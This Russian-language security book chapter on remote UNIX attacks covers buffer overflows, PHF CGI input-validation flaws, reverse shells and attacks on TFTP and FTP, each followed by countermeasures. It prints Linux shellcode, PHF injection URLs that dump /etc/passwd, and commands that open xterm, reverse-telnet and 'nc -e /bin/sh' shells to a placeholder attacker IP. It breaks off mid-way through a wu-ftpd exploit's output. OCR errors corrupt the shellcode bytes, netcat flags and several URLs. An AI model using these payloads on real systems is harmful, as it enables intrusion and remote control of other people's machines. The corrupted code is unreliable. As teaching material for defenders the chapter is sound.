    Обсудив "притчу во языцах" — взлом с помощью подбора паролей, — можно перейти к другому методу, также ставшему стандартом "де факто" при получении удаленного доступа. Этот метод заключается в использовании для взлома определенных данных (data driven attack), отправляемых активной службе, что позволяет получить неожиданные или нежелательные результаты. Конечно, формулировка "неожиданные или нежелательные" достаточно субъективна. Все зависит от того, кто вы — хакер или же программист, разработавший соответствующую службу. С точки зрения взломщика, результат может быть более чем желательным, поскольку в этом случае он сможет получить доступ к интересующему его компьютеру. С точки зрения же программиста, программа, получившая данные, к приему которых она не была готова, выдает нежелательные результаты. Методы взлома с использованием данных можно разделить на две категории: атака путем переполнения буфера и взлом при отсутствии проверки ввода. В последующих подразделах каждая из этих категорий будет рассмотрена более подробно.

    Взлом путем переполнения буфера



    В ноябре 1996 года подходы к компьютерной безопасности изменились раз и навсегда. Ведущий списка рассылки Bugtraq Алеф Ван (Aleph One) опубликовал в номере 49 журнала Phrack Magazine, посвященного вопросам безопасности, статью под названием "Разрушение стека для развлечения и извлечения выгоды" (Smashing The Stack For Fun And Profit). Эта статья произвела колоссальный эффект на состояние дел в сфере обеспечения безопасности, поскольку в ней очень ясно показано, как практика некачественного программирования может привести к нарушению безопасности путем переполнения буфера. Первые упоминания об использовании этой методологии датируются 1988 годом в связи с нашумевшим делом о сетевом черве Роберта Морриса (Robert Morris), однако полезной информации о ее конкретных подробностях не было вплоть до 1996 года.
    Состояние переполнения буфера (buffer overflow) возникает тогда, когда пользователь или процесс пытается поместить в буфер (или массив фиксированного размера) данных больше, чем для этого выделено памяти программистом. Подобная ситуация зачастую связана с использованием таких функций языка С, как strcpy (), strcat (} и sprintf (), а также ряда других. Переполнение буфера обычно приводит к генерации ошибки нарушения сегментации. Однако это состояние может вызываться преднамеренно с целью получения доступа к системе. Хотя мы рассматриваем методы взлома с помощью удаленного доступа, переполнение буфера может происходить и в локальных программах, о чем мы поговорим несколько позже. Для того чтобы лучше понять, как этот метод взлома срабатывает на практике, давайте рассмотрим один очень простой пример.
    Допустим, для вводимых данных в программе выделяется буфер фиксированного размера 128 байт. Предположим, что этот буфер создается для размещения данных, поступающих от команды VRFY программы sendmail. Как вы помните из главы 3, эта команда использовалась для того, чтобы установить потенциальных пользователей по их почтовым адресам. Предположим также, что sendmail запущена в контексте прав SU1D пользователя root и пользуется его привилегиями (во многих системах этот так и есть, хотя и не всегда). Что произойдет, если взломщик подключится к демону sendmail и отправит в качестве параметра команды VRFY строку состоящую из 1000 символов а, а не короткое имя пользователя?
    echo "vrfy 'perl -е 'print "a" x 1000''" |nс www.targetsystem.com 25
    Поскольку буфер, предназначенный для хранения параметра VRFY, имеет размер всего 128 байт, возникнет ситуация его переполнения. Это может привести к генерации состояния DoS и аварийному завершению демона sendmail. Однако более опасными являются ситуации, когда программа, буфер которой переполнился, продолжает работать и выполняет при этом программный код, переданный ей в виде избыточных данных. Именно это и является основным смыслом рассматриваемой в данном разделе атаки.
    Вместо того, чтобы отправлять бессмысленную строку, состоящую из 1000 символов а, взломщик, скорее, передаст определенный набор кодов, который после переполнения буфера выполнит команду /bin/sh. Если, как мы условились, sendmail работает с привилегиями суперпользователя, то после запуска /bin/sh взломщик сразу же сможет получить доступ в качестве суперпользователя. Возможно, вы никак не можете понять, каким же образом программа sendmail узнает, что ей нужно выполнить команду /bin/sh? Все очень просто. В процессе взлома в качестве параметра команде VRFY передается строка, содержащая некоторый ассемблерный код, призванный вызвать переполнение буфера. При переполнении буфера адрес возврата переустанавливается на код, переданный хакером, что позволяет последнему получить полный контроль над программой. Иными словами, вместо возврата управления из функции по нужному адресу выполняется некоторый код взломщика, передаваемый в этом же пакете данных и запускающий команду /bin/sh.
    Конечно, необходимо помнить, что ассемблерный код очень сильно зависит от архитектуры и используемой операционной системы. Поэтому данные, используемые для переполнения буфера системы Solaris, установленной на компьютерах с процессорами Intel, не имеют ничего общего с данными, предназначенных для взлома системы Solaris компьютеров SPARC. Следующий пример показывает, как выглядит машинный код (такой код еще называют "яйцом" (egg), по аналогии с яйцами кукушки, которые она подкладывает в чужие гнезда), предназначенный переполнения буфера на платформе Linux X86.

    char shellcode[]= "\xeb\xlf\x5e\x89\x76\x08\x31\xcO\
    x88\x46\x07\x89\x46\xOc\xbO\xOb"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\xOc\xcd\
    x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    Очевидно, что взлом с помощью переполнения буфера чрезвычайно опасен. Достаточно сказать, что он не раз использовался во многих успешных попытках получения несанкционированного доступа. Приведенный выше пример очень прост. На самом деле работающий код создать очень трудно. Однако зачастую изобретать велосипед не приходится: множество таких "яиц" уже было создано хакерами и помещено в Internet. Описание деталей процесса создания "яйца" выходит за рамки этой книги, поэтому мы советуем познакомиться с упоминавшейся выше статьей хакера Алефа Вана в журнале Phrack Magazine.  Если вы хотите улучшить свои навыки написания ассемблерного кода, прочтите книгу Криса Дрейка (Chris Drake) и Кимберли Браун (Kimberley Brown) Panic — UNIX System Crash and Dump Analysis. Кроме того, группа программистов и специалистов по безопасности Тесо (Teso) разработала несколько утилит, которые позволяют автоматически генерировать подобный код. Эти средства можно найти по адресу http://teso.scene.at/releases.php.

    Контрмеры: защита от атак с использованием переполнения буфера



    Практика безопасного кодирования



    Лучшим методом зашиты от переполнения буфера является практика кодирования, учитывающего все требования обеспечения безопасности. Хотя на практике невозможно спроектировать и запрограммировать систему таким образом, чтобы в ней не было ни одной ошибки, существуют подходы, способные минимизировать вероятность возникновения переполнения буфера. Среди таких рекомендаций можно выделить следующие.

    •  При проектировании программы всегда оценивайте ее с точки зрения безопасности. К сожалению, зачастую программы создаются наспех, чтобы успеть к поставленному сроку. В таких ситуациях безопасность — это последнее, о чем думают разработчики. При этом поставщики программного обеспечения даже не беспокоятся о том, чтобы своевременно устранять изъяны по мере их обнаружения. Более подробная информация по этому вопросу приведена в разделе Secure UNIX Program по адресу http://www.whitefang.com/sup/index.html.
    •  Рассмотрите возможность использования безопасного компилятора, такого, например, как StackGuard, разработанного в рамках проекта Immunix . В этом компиляторе используется подход, заключающийся в "вакцинации" программ во время компиляции, что позволяет свести к минимуму риск возникновения переполнения буфера. Кроме того, к механизмам защиты относится динамическая библиотека libsafe, предназначенная для перехвата вызовов уязвимых функций на уровне операционной системы.  Помните о том, что подобные механизмы нельзя рассматривать как "серебряную пулю", так что при их использовании все же не стоит забывать о необходимости обеспечения безопасности.
    •  Нужно проверять все аргументы, получаемые от пользователя или какой-либо программы. Такая проверка, конечно, может замедлить некоторые приложения, но это не очень высокая цена за безопасность. При проведении проверки особое внимание необходимо уделять принадлежности используемых значений корректным диапазонам, особенно для переменных окружения.
    •  Используйте безопасные процедуры, такие как fget(), strncpy() и strncat () и проверяйте коды возврата системных вызовов.
    •  Уменьшите количество кода, запускаемого с привилегиями root. Этого можно достичь за счет минимизации использования программ, которым требуются права SUID суперпользователя. Если даже злоумышленнику удастся успешно применить к такой программе атаку с переполнением стека, то ему все равно придется повышать полученные привилегии до уровня root.
    •  И наконец, применяйте все модули обновления, предоставляемые поставщиком программного обеспечения.

    Тестирование и аудит каждой программы



    Очень важно выполнять тестирование и аудит каждой программы. Очень часто случается, что программисты даже не задумываются о том, может ли в их программе возникнуть ошибка переполнения буфера. Однако всегда найдется кто-нибудь, кто не только задумается над этим, но и приложит все усилия для того, чтобы найти такие ошибки и воспользоваться ими в своих целях. Одним из лучших примеров тестирования и аудита кода UNIX является проект OpenBSD (www.openbsd.org), которым руководит Тео де Раадт (Theo de Raadt). Программисты, работающие над проектом OpenBSD, постоянно проверяют и перепроверяют исходный код друг друга и уже исправили сотни ошибок, которые могут привести к переполнению буфера, не говоря уже о более серьезных проблемах, имеющих отношение к безопасности. Именно из-за столь грамотного подхода к тщательному аудиту, применяемого разработчиками OpenBSD, эта операционная система заслужила репутацию одной из самых надежных из свободно распространяемых версий UNIX.

    Отключение неиспользуемых или потенциально опасных служб



    На протяжении этой главы мы будем возвращаться много раз к этому вопросу. Если какие-то неиспользуемые или потенциально опасные службы не являются жизненно необходимыми для работы системы UNIX, отключите их. Помните, что ни один злоумышленник не может проникнуть в систему через неработающую службу. Кроме того, мы настоятельно рекомендуем использовать TCP-оболочки (tcpd) и xinetd (http://www. synack.net/xinetd/) для того, чтобы можно было применить избирательные списки управления доступом на уровне служб, а также воспользоваться дополнительным возможностями регистрации событий. Конечно, не к каждой службе можно применить оболочку. Однако применение этого средства лишь к некоторым службам может значительно повысить защищенность вашей системы. Кроме того, оцените возможность использования режима фильтрации пакетов на уровне ядра, поддержка которого уже стала стандартной для большинства бесплатных операционных систем UNIX (например, ipchains или netf liter для Linux, ipf для BSD). Хорошие рекомендации по использованию ipchains для обеспечения безопасности можно найти по адресу http://www.linuxdoc.org/HOWTO/IPCHAINS-HOWTO.html. Пакет ipf Даррена Рида (Darren Reed) является одним из лучших и может быть добавлен во многие версии системы UNIX. Для получения об этом пакете более подробной информации обращайтесь по адресу http: //www.obfuscation. rg/ ipf / ipf-howto. html.

    Отключение режима поддержки выполнения стека



    Некоторые радетели чистоты нередко прибегают даже к отключению режима поддержки выполнения стека (stack execution), чтобы обеспечить защиту каждой программы от взлома с помощью переполнения буфера. Хотя такое решение может привести к некоторым побочным эффектам, в большинстве систем оно все же обеспечивает защиту от скрытого использования уязвимых мест. Для Linux имеется модуль обновления, позволяющий отключить режим поддержки выполнения стека, который можно применять в системах с ядром версий 2.0.x и 2.2.x Первым разработал такой модуль хакер Solar Desinger (http://www.false.com). Этот модуль обновления, ценный в основном для программистов, можно найти по адресу http: //www. openwall. com/linux/.
    Для системы Solaris версии 2.6 и 7 мы настоятельно рекомендуем включить поддержку режима, запрещающего выполнение стека (no-stack execution). Это позволит обезопасить систему Solaris от применения множества методов взлома, приводящих к переполнению буфера. Хотя прикладной двоичный интерфейс (ABI — Application Binary Interface) компаний Intel и SPARC позволяет выполнять код, находящийся в сегменте стека, большинство программ будет работать вполне корректно даже при отключенном стеке. По умолчанию в системах Solaris 2.6 и 7 режим выполнения стека включен. Для того чтобы отключить поддержку этого режима, добавьте следующую строку в файл /etc/system file.
    set noexec_user_stack=l 
    set noexec_user_stack_log=l
    Помните, что запрещение выполнения стека — не панацея. Отключив этот режим, обычно можно зарегистрировать любую программу, которая попытается выполнить код. помещенный в стек, и таким образом можно остановить взломщиков с низкой квалификацией. Однако опытные взломщики чрезвычайно изобретательны и вполне могут написать код (и воспользоваться им), который приведет к переполнению буфера с последующим взломом системы, несмотря на то, что в ней запрещено выполнение стека.
    В то время как многие администраторы изо всех сил пытаются предотвратить переполнение стека, отключив режим выполнения помещенного в него кода, их подстерегают другие опасности, причиной которых является несовершенный код. В наши планы не входит подробное рассмотрение этого вопроса. Достаточно лишь сказать, что переполнение в свободной памяти (которая называется также кучей (heap) или динамической памятью) также может оказаться достаточно опасным. В этом случае переполняется память, динамически распределенная приложением. Такой тип переполнения отличается от переполнения стека, зависящего от длины фиксированного буфера. К сожалению, разработчики программного обеспечения, как правило, не предусматривают аналогичного параметра, позволяющего запретить выполнение стека. Таким образом, просто запретит) выполнение кода, помешенного в стек, нельзя обеспечить достаточно высокий уровень зашиты. Дополнительную информацию о переполнении динамической памяти можно найти в результатах исследований группы w00w00 по адресу http://www.w00w30.org/files/heaptut/heaptut.txt.

    Взлом при отсутствии проверки ввода



    В 1996 году Дженифер Майерс (Jennifer Myers) идентифицировал ставший впоследствии широко известным изъян PHF. Хотя атаки с использованием этого изъяна уже отошли в прошлое, на его примере очень хорошо видно, как может осуществляться взлом при отсутствии проверки ввода (input validation attack). Если вы разберетесь в основном механизме этого метода, то сможете применить полученные знания и к другим подобным подходам. В данной главе мы не будем посвящать много времени этой теме, поскольку она подробно рассматривается в главе 15. Наша цель — лишь показать, что из себя представляет взлом при отсутствии проверки ввода и как с его помощью злоумышленник может получить доступ к системе UNIX.
    Для осуществления такой атаки необходимо, чтобы выполнялись следующие условия.

    •  Программа не в состоянии распознать синтаксически некорректные данные.
    •  Модуль воспринимает посторонние данные.
    •  Модуль не в состоянии обработать ситуацию отсутствия определенных полей.
    •  Возникает ошибка корреляции значений полей.

    PHF— это сценарий CGI (Common Gateway Interface— интерфейс общего шлюза), ставший стандартом в ранних версиях Web-сервера Apache и сервера HTTPD центра NCSA (National Center for Supercomputing Applications — Национальный центр суперкомпьютерных приложений). К сожалению, эта программа не в состоянии ни правильно провести синтаксический анализ входных данных ни проверить их пригодность. Исходная версия сценария PHF принимала символ новой строки (%0а) и выполняла следующие за ним команды с привилегиями пользователя, запустившего Web-сервер. Поэтому сразу же был изобретен метод взлома PHF, показанный ниже. 
    /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    На момент написания этой книги данный код не мог выполнить ничего, кроме вывода файлов паролей с помощью команды cat. Конечно, эта информация может использоваться для определения идентификаторов пользователей, а также зашифрованных паролей (при условии, что пароли не содержатся в файле с повышенной защитой shadow). В большинстве случаев этого достаточно, чтобы даже неопытный злоумышленник смог взломать файл паролей и зарегистрироваться в системе. Опытный же взломщик сможет не только проникнуть в систему, но и получить прямой доступ к командной оболочке, как будет показано ниже в этой главе. Помните, что этот изъян позволяет взломщику выполнить любую команду с привилегиями пользователя, от имени которого запущен Web-сервер. В большинстве случаев, конечно, таким пользователем является nobody, однако, к сожалению, нередко встречаются узлы, на которых Web-сервер работает на уровне привилегий суперпользователя root, — ни больше, ни меньше!
    В 1996-1997 годах взломы PHF были очень популярны. От этих простых, но очень эффективных приемов пострадали очень многие Web-узлы. Поскольку данный подход пригоден и для проведения других взломов при отсутствии проверки ввода, необходимо хорошо понимать, как именно данный изъян используется злоумышленниками. В системе UNIX имеются метасимволы, зарезервированные для специальных целей. К таким метасимволам относятся следующие (данный перечень не является исчерпывающим).
    \ /<>!$% ^ & * | {}[]`"` ~ ;
    Если программа (или сценарий CGI) принимает какие-то данные, вводимые пользователем, и не проверяет их корректность, то такая программа может подвергнуться взлому с помощью специально подобранного кода. Этот метод обычно называется "выбросом" (escaping out) в командную оболочку и позволяет передать в качестве параметра один из метасимволов UNIX. Данный подход очень распространен и не ограничивается одними лишь сценариями PHF. Имеются многочисленные примеры незащищенных программ CGI, входящих в базовый комплект поставки Web-серверов. Что еще хуже, многие уязвимые программы создаются "профессиональными" разработчиками Web-узлов, имеющими весьма смутное представление о безопасности. К сожалению, с развитием электронной коммерческой деятельности и появлением множества соответствующих приложений с дополнительным набором функций (увеличивающих, соответственно, их сложность), количество таких взломов только возрастает.

    Контрмеры



    Как уже упоминалось раньше, одним из лучшим способов превентивной защиты является разработка программ с учетом требований обеспечения безопасности. Это же правило можно в полной мере применить и к защите от описанного выше взлома. Абсолютно необходимо, чтобы программы и сценарии воспринимали только те данные, которые они должны воспринимать. В разделе часто задаваемых вопросов WWW Security, расположенном по адресу http://www.w3.org/Security/Faq/www-security-faq.html, содержится важная информация о том, как сделать защищенными программы CGI. Поскольку очень трудно выполнять проверку каждой порции входных данных, лучше, чтобы эти процедуры по умолчанию отбрасывали все критические данные. Кроме того, после компиляции тщательно контролируйте и тестируйте весь программный код.


    8. Интерактивный доступ к командной оболочке



    Интерактивный доступ к командной оболочке


    Обсудив два основных метода получения доступа к системе UNIX, необходимо поговорить и об методах, используемых для получения доступа к командной оболочке (shell account access). Необходимо помнить, что основной целью любого взломщика является получение доступа к командной строке или к командной оболочке интересующей его системы. Традиционный метод получения интерактивного доступа к командной оболочке заключается в удаленной регистрации на сервере UNIX с помощью таких программ, как telnet, rlogin или ssh. Кроме того, можно выполнять команды, используя утилиты rsh, ssh, или rexec, не проходя этапа удаленной регистрации. У вас может возникнуть вопрос — а что, если все службы, поддерживающие удаленный доступ, отключены или заблокированы на уровне брандмауэра? Может ли в этом случае взломщик получить доступ к командной оболочке целевой системы? Хороший вопрос. Давайте рассмотрим один пример, на котором можно исследовать различные методы, с помощью которых взломщик может получить интерактивный доступ к командной оболочке UNIX. Эти методы иллюстрируются на рис. 8.1.



    Рис. 8.1. Упрощенная архитектура демилитаризованной зоны

    Предположим, что взломщик пытается получить доступ к Web-серверу, работающему под управлением операционной системы UNIX, который находится в сегменте так называемой "демилитаризованной зоны" (DMZ) — небольшой сети, размешенной за промышленным маршрутизатором или брандмауэром, защищающим внутреннюю сеть. Тип и модель брандмауэра или маршрутизатора не имеют особого значения. Важно лишь понимать, что такое устройство относится к классу маршрутизирующих брандмауэров, которые не выполняют функций сервера-посредника ни для одной из служб. Предположим, что единственные службы, которая поддерживается брандмауэром, — это HTTP (порт 80) и HTTP поверх SSL (HTTPS) (порт 443). Теперь предположим, что Web-сервер не может противостоять попыткам взлома, например, основанным на изъяне PHF. Кроме того, пусть Web-сервер работает на уровне привилегий пользователя nobody, что является широко распространенной практикой и считается хорошим решением с точки зрения безопасности. Таким образом, если взломщику удастся проникнуть на Web-сервер, используя недостатки в обработке ввода PHF, он сможет выполнять код на сервере с уровнем привилегий пользователя nobody. Это, конечно, важно, но возможность запуска выполняемого кода — лишь первый шаг в получении интерактивного доступа к командной оболочке.

    Операции в системе X



    После того как взломщик получил возможность выполнять команды на Web-сервере, используя недостатки в реализации PHF, первым из методов, которыми он воспользуется для получения интерактивного доступа к командной оболочке, будет применение средств X Window системы UNIX (далее — просто X). X — это система оконного интерфейса, которая позволяет разным программам использовать один и тот же графический дисплей. Система X чрезвычайно устойчива и позволяет поддерживающим ее клиентным программам отображать свои результаты на локальном или на удаленном сервере X (с использованием портов 6000-6063). Один из самым удобных для взломщика инструментов в этом случае является клиентная программа xterm. Эта программа предназначена для запуска локальной командной оболочки, работающей под управлением X. Однако, применив параметр -display, взломщик может перенаправить командную оболочку на сервер X собственного компьютера. Вот так — быстро и просто.
    Давайте посмотрим, как с использованием изъяна PHF злоумышленник может получить результаты, выходящие за рамки простого отображения содержимого файла passwd. Как вы помните, для достижения последнего результата использовалась следующая команда. /cgi-bin/phf?Qalias=x%0a/bin/cat/%20/etc/passwd
    Поскольку на Web-сервере взломщик может выполнять любые удаленные команды, то немного модифицированный вариант позволит получить и интерактивный доступ к командной оболочке. Все, что для этого нужно сделать, — это заменить команду /bin/cat /etc/passwd командой /usr/X11R6/bin/xterm-ut -display IР_хакера : 0 . 0, как показано ниже.
    /cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/
    xterm%20-ut%20-display IР_хакера:0.0

    Это приведет к тому, что удаленный сервер запустит xterm и выведет окно на X-сервере хакера, имеющего IP-адрес 1Р_хакера, с идентификатором окна 0 и идентификатором экрана 0. С этого момента в руках взломщика окажется полный контроль над целевым компьютером. Кроме того из-за использования параметра -ut это событие не будет зарегистрировано системой. Кроме того, используемые в команде символы %20 представляют собой шестнадцатеричное представление символов пробела, с помощью которых параметры отделяются друг от друга (для получения более подробной информации воспользуйтесь командой man ascii). Таким образом, взломщик получил интерактивный доступ к командной оболочке без регистрации любой службой Web-сервера. Кроме того, вы, должно быть, обратили внимание на то, что в команде использован полный путь к исполняемому файлу xterm. Это сделано для того, чтобы обеспечить запуск программы независимо от того, правильно ли установлена переменная окружения PATH. Применение полного имени файла гарантирует безусловный запуск соответствующей программы.

    Реверсивный сеанс telnet и обратные каналы



    Безусловно, программа xterm представляет собой самое простое средство получения контроля над системой UNIX. Однако как быть в том случае, если об этом знает не только злоумышленник, но и администратор, удаливший систему X? Эта мера, конечно же, повысит безопасность системы UNIX, но одной ее недостаточно, так как в распоряжении потенциального взломщика остается еще много других методов получения несанкционированного доступа. Одним из таких методов, в частности, является создание обратных каналов. В данном случае термин обратный канал (back channel) применяется для описания механизма, с помощью которого коммуникационный канал создается по направлению от взламываемого узла к компьютеру взломщика, а не наоборот, как при использовании обычных коммуникационных каналов. Нужно напомнить, что в рассматриваемом примере взломщик не может получить интерактивный доступ к командной оболочке обычным способом, так как все порты, кроме 80 и 443, блокируются брандмауэром. Таким образом, злоумышленник должен добиться того, чтобы взламываемый сервер инициировал сеанс с его компьютером, т.е. создать обратный канал.
    Для решения этой задачи можно воспользоваться несколькими методами. Первый из них, называемый реверсивный сеанс telnet, заключается в применении утилиты telnet для создания обратного канала от взламываемой системы к компьютеру взломщика. Название реверсивный сеанс telnet (reverse telnet) объясняется тем, что устанавливаемое с помощью команды telnet соединение инициализируется не системой взломщика, а системой, к которой он хочет получить доступ. В большинстве систем UNIX имеется клиент telnet и его использование практически никогда не ограничивается. Именно поэтому в тех случаях, когда программа xterm оказывается недоступной, telnet является вторым прекрасным средством, которое можно применить для создания обратного канала. Чтобы с помощью команды telnet создать обратный канал, необходимо воспользоваться всемогущей утилитой netcat (nc). Для того чтобы другой компьютер мог связаться с вашим компьютером посредством утилиты telnet, необходимо, чтобы на последнем в режиме ожидания была запущена утилита nс, которая и обеспечит установку реверсивного соединения telnet. Для этого в двух отдельных окнах необходимо запустить на выполнение следующие команды.

    [tsunami]! nc -I -n -v -p 80
    listening on [any] 80
    [tsunami]! nc -1 -n -v -p 25
    listening on [any] 25

    Прежде чем запускать утилиту пс, убедитесь, что в вашей системе с входящими портами 8 С и 25 не связано никаких служб, находящихся в режиме ожидания запросов, например HTTPD или sendmail. Если такие службы имеются, необходимо завершить выполнение соответствующих процессов с помощью команды kill, чтобы освободить требуемые порты для утилиты пс. Параметр -1 означает, что утилиту пс необходимо запустить в режиме ожидания запросов; параметр -v включает режим вывода подробной информации; параметр -n указывает, что IP-адреса не нужно преобразовывать в имена узлов, а параметр -р определяет порт, который будет прослушиваться.
    Возвращаясь к рассматриваемому примеру, отметим, что для инициализации реверсивного соединения telnet на взламываемом сервере необходимо запустить следующую команду, действие которой основано на наличии уже известного нам изъяна PHF.
    /bin/telnet IР_хакера 80 | /bin/sh | /bin/telnet IР_хакера 25
    Данная команда, представленная в виде параметра PHF, выглядит следующим образом.
    /cgi-bin/phf?Qalias=
    x%0a/bin/telnet%20IP_xaкepa
    %2080%20I%20/bin/sh%20
    |%20/bin/telnet%20IP_xaкepa%2025

    Давайте посмотрим, что происходит, когда Web-серверу броузер передает данную строку. С помощью команды /bin/telnet IР_хакера 80 на взламываемом узле запускается telnet и подключается к порту 80 нашего компьютера. Это позволит нам вводить команды, которые будут выполняться удаленным компьютером. В соответствии со стандартными соглашениями ввода/вывода системы UNIX все, что мы будем набирать на клавиатуре, будет перенаправляться в качестве ввода командной оболочке Bourne (/bin/sh). Выводимые же результаты с помощью конвейера будут перенаправлены командой /bin/telnet по адресу IР_хакера на порт 25. Все это вместе взятое и создаст реверсивный сеанс teinet-связи. отображаемый в двух окнах. Порты 80 и 25 выбраны из-за того, что большинство брандмауэров чаще всего разрешает их использовать для создания исходящих соединений. Однако можно выбрать и любые другие порты, — лишь бы их использование для обмена данными не блокировались брандмауэром.
    Второй метод создания обратного канала заключается в использовании самой утилиты nс. Для этого достаточно, чтобы программа nс уже присутствовала на сервере или могла быть помещена туда с помощью какого-либо механизма (например, через анонимный сеанс FTP). Как мы уже не раз отмечали, пс — это одна из лучших утилит. Поэтому совсем не удивительно, что в последнее время ее можно найти в комплекте поставки многих бесплатных версий UNIX. К сожалению, последнее обстоятельство имеет и обратную сторону — это повышает вероятность того, что хакеру даже не понадобится внедрять эту утилиту на интересующий его узел. Однако само присутствие пс на узле еще вовсе не означает, что ее можно сразу же использовать для создания обратного канала, поскольку нет никаких гарантий того, что она была скомпилирована с использованием директивы #def ine GAPING_SECURITY_HOLE, без которой параметр -е, используемый для создания обратного канала, применить не удастся. В нашем примере мы будем считать, что на узле каким-то образом оказалась нужная версия пс.
    Подобно описанному выше telnet-методу, создание обратного канала с помощью утилиты пс состоит из двух этапов. Сначала необходимо выполнить следующую команду, которая впоследствии обеспечит взаимодействие с обратным каналом, созданным с использованием nс на взламываемом компьютере.
    [tsunami]# nс -1 -n -v -p 80
    После того как запущена утилита прослушивания, на удаленном узле необходимо выполнить следующую команду.
    nс —е /bin/sh IР_хакера 80
    Данная команда, представленная в форме, требуемой для использования изъяна PHF, имеет следующий вид.
    /cgi-bin/phf?Qalias=x%0a/bin/nc%20-
    e%20/bin/sh%20IP_xaкepa%2080

    Как только Web-сервер выполнит эту строку, с помощью утилиты nс будет создан обратный канал, который подключит командную оболочку (в данном случае — /bin/sh) к находящемуся в режиме ожидания компьютеру хакера. Это обеспечит интерактивный доступ к командной оболочке, причем соединение будет установлено самой взламываемой системой.

    Контрмеры: защита от попыток создания обратных каналов



    Противостоять попыткам создания обратного канала очень трудно. Самой лучшей превентивной мерой является применение всех средств обеспечения безопасности, что позволит устранить возможность использования подобного метода. К таким мерам относятся отключение ненужных служб и применение всех модулей обновления сразу же после их появления.
    Среди прочих защитных мероприятий можно выделить следующие.

    •  Удалите систему X со всех компьютеров, которым требуется высокий уровень обеспечения безопасности. Это позволит защититься не только от потенциальной опасности использования взломщиками программы xterm, но и от служащих, которые могут попытаться расширить свои полномочия до привилегий суперпользователя root, воспользовавшись недостаточной степень защиты Х-сервера.
    •  Если Web-сервер функционирует с привилегиями пользователя nobody, настройте разрешения для исполняемых файлов, например telnet, таким образом, чтобы запретить их выполнение всем пользователям, за исключением владельцев этих файлов и определенных групп (например, с использованием команды chmod 750 telnet). Это позволит сохранить возможность запуска telnet легитимными пользователями, но лишит такой возможности те программы, использующие идентификаторы пользователей, которые не должны запускать telnet в процессе своей работы.
    •  В некоторых случаях можно настроить брандмауэр таким образом, чтобы запретить соединения, исходящие от Web-сервера или другого внутреннего узла. Это особенно полезно, если брандмауэр построен на основе прокси-сервера. поскольку создать обратный канал через такой брандмауэр, выполняющий аутентификацию, достаточно сложно, но все же возможно.



    1.gif

    Изображение: 

    9. Часто используемые методы удаленного взлома



    Часто используемые методы удаленного взлома


    Хотя мы не сможем описать все возможные методы удаленного взлома, однако, как нам кажется, у вас уже должно было выработаться общее представление об основных принципах подобных атак, на основании которого вы сможете самостоятельно разобраться в тех или иных конкретных методах. Перед завершением обсуждения методов удаленного взлома мы хотим рассмотреть несколько важных служб, часто подвергающимся таким атакам, а также указать, с помощью каких контрмер можно снизить риск использования этих служб для проникновения в систему в тех случаях, когда отключение службы не представляется возможным.

    TFTP



    Протокол TFTP (Trivial File Transfer Protocol — простой протокол передачи файлов) обычно используется для загрузки бездисковых рабочих станций или сетевых устройств. таких как маршрутизаторы. TFTP — это основанный на UDP протокол, который использует порт 69 и характеризуется очень низким уровнем безопасности. Практически каждый случай, когда взломщик встречает систему, на которой запущен сервер TFTP, заканчивается попыткой получения через TFTP копии файла /etc/passwd. Если сервер TFTP не настроен должным образом, это приводит к тому, что система без малейшего сопротивления позволяет скопировать этот файл. Тем самым в руки взломщика попадает файл с информацией о пользовательских именах, после чего он может попробовать подобрать пароль. Кроме того, если пароли не хранятся в файле /etc/shadow, то, помимо пользовательских имен, взломщик получает также и зашифрованные пароли, в результате чего им может быть предпринята попытка их взлома или подбора.
    Многие последние версии TFTP по умолчанию настроены таким образом, что разрешают доступ только к каталогу /tftpboot. Это очень хорошая мера предосторожности, однако все же возможность получения файлов с диска взламываемого компьютера, пусть даже лишь из одного каталога /tftpboot, может угрожать безопасности. Например, злоумышленник может найти в нем важные конфигурационные файлы маршрутизаторов. имена которых обычно имеют вид <имя_узла_маршрутизатора> .cfg. Во многих случаях взломщик также сможет получить доступ к паролям маршрутизатора и строкам доступа SNMP. Нам приходилось встречать целые сети, взломанные в течение нескольких часов с помощью подключения к незащищенному TFTP-серверу и получения от него конфигурационных файлов маршрутизаторов. Извлечь из этих файлов пароли и строки доступа SNMP — это лишь дело техники. Как правило, эти сведения оказываются идентичными для каждого сетевого устройства.

    Контрмеры: защита TFTP



    Убедитесь в том, что сервер TFTP ограничивает доступ к определенным каталогам, таким как /tftpboot. Это воспрепятствует взломщикам получить важную информацию о конфигурации системы. Кроме того, рассмотрите возможность реализации механизма управления доступом на уровне всей сети в целом и на уровне отдельных узлов, который запрещал бы несанкционированный доступ к серверу TFTP.

    FTP



    В настоящее время протокол FTP (File Transfer Protocol), позволяющий обмениваться файлами с удаленными системами, является одним из наиболее популярных. Это одна из причин, по которым он часто используется для несанкционированного доступа к удаленным системам или скрытной записи файлов. Многие FTP-серверы разрешают анонимный доступ, т.е. позволяют подключаться любому пользователю без какой-либо аутентификации. Обычно при этом файловая система, доступная анонимному пользователю, ограничивается определенными каталогами. Однако иногда бывает так, что анонимный пользователь может получить доступ к любому каталогу и файлу системы. Такая оплошность системного администратора дает возможность взломщику найти важные конфигурационные файлы, прежде всего /etc/passwd. Что еще хуже, многие FTP-серверы позволяют всем пользователям записывать информацию в свои каталоги. Такая "гремучая смесь" является "миной замедленного действия", подложенной под систему защиты. Например, взломщик может поместить файл .rhosts в личный каталог пользователя, чтобы впоследствии подключиться к системе с помощью утилиты rlogin. Кроме того, многие FTP-серверы взломаны охотниками за программным обеспечением, которые помешают нелегальные программы в скрытых каталогах. Поэтому, если нагрузка на вашу сеть возрастет за день в три раза, это может служить косвенным признаком того, что вашу систему используют для копирования очередной пиратской копии.
    Помимо риска, связанного с разрешением анонимных подключений, FTP-серверы вносят свою лепту и в создание проблем, возникающих при переполнении буфера и других нарушениях. Одно из таких слабых мест было недавно обнаружено в системах, использующих для поддержки протокола FTP программу wu-ftpd 2.6.0 и ее более ранние версии (ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02). Эта ошибка связана с неправильной проверкой аргументов в нескольких вызовах функций, обеспечивающих возможность использования на узле ограниченного набора команд. Однако при этом взломщик может применить специальные форматы вывода символов, используемые функцией printf () (%f, %p, %n и т.д.) и выполнить произвольный код с привилегиями root. Вот как выглядит такая атака, примененная к системе RedHat 6.2.

    [thunder]# wugod -t 192.168.1.10 -sO
    Target: 192.168.1.10 (ftp/<shellcode>):
    RedHat 6.2 (?) with wuftpd
    2.6.0(1) from rpm
    Return Address: 0x08075844, AddrRetAddr:
